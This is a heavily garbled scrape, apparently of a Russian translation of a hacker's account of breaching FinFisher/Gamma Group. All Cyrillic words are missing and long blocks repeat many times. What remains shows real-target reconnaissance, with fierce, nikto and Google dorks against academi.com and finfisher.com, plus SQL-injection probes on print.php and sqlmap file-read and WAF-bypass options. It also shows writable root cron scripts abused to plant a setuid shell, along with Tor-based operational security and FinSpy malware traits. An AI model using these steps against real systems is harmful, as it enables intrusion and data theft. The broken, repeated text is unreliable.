-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
